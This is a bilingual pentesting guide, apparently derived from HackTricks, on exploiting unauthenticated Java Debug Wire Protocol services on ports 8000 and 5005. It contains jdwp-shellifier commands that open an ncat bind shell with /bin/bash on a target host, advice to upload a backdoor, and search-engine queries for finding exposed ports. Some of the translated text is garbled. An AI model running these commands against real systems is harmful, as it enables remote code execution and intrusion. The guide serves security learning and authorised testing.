5005 - Jdwp

💡 学习提示: 本文档介绍 Jdwp Java Debug Wire Protocol 的渗透测试方法，适合信息安全初学者和从业人员参考。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

渗透测试 JDWP - Java Debug Wire 协议

Exploiting

JDWP exploitation hinges on the protocol’s lack of authentication and encryption. It’s generally found on port 8000, but other ports are possible. The initial connection is made by sending a “JDWP-Handshake” to the target port. If a JDWP service is active, it responds with the same string, confirming its presence. This handshake acts as a fingerprinting method to identify JDWP services on the network.

In terms of process identification, searching for the string “jdwk” in Java processes can indicate an active JDWP session.

The go-to tool is jdwp-shellifier. You can use it with different parameters:

./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept

I found that the use of --break-on 'java.lang.String.indexOf' makes the exploit more stable. And if you have the chance to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.

More details

This is a summary of https://ioactive.com/hacking-java-debug-wire-protocol-or-how/. Check it for further details.

1. JDWP 概述:

   • It’s a packet-based network binary protocol, primarily synchronous.
   • Lacks authentication and encryption, making it vulnerable when exposed to hostile networks.

2. JDWP Handshake:

   • A simple handshake process is used to initiate communication. A 14-character ASCII string “JDWP-Handshake” is exchanged between the Debugger (client) and the Debuggee (server).

3. JDWP Communication:

   • Messages have a simple structure with fields like Length, Id, Flag, and CommandSet.
   • CommandSet values range from 0x40 to 0x80, representing different actions and events.

4. 漏洞利用:

   • JDWP allows loading and invoking arbitrary classes and bytecode, posing security risks.
   • The article details an exploitation process in five steps, involving fetching Java Runtime references, setting breakpoints, and invoking methods.

5. Real-Life 漏洞利用:

   • Despite potential firewall protections, JDWP services are discoverable and exploitable in real-world scenarios, as demonstrated by searches on platforms like ShodanHQ and GitHub.
   • The exploit script was tested against various JDK versions and is platform-independent, offering reliable 远程代码执行 (远程代码执行).

6. 安全 Implications:

   • The presence of open JDWP services on the internet underscores the need for regular security reviews, disabling debug functionalities in production, and proper firewall configurations.

参考资料:

• [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/]
• https://github.com/IOActive/jdwp-shellifier
• http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html
• http://www.secdev.org/projects/scapy(no longer active)
• http://www.shodanhq.com/search?q=JDWP-HANDSHAKE
• http://www.hsc-news.com/archives/2013/000109.html (no longer active)
• http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt
• https://github.com/search?q=-Xdebug+-Xrunjdwp&type=Code&ref=searchresults
• http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html
• http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html
• http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html
• http://nmap.org/nsedoc/scripts/jdwp-exec.html

搜索引擎语法

FOFA

# FOFA 搜索语法
port="5005"

Shodan

# Shodan 搜索语法
port:5005

ZoomEye

# ZoomEye 搜索语法
port:5005

📖 参考资料

• HackTricks - 5005-jdwp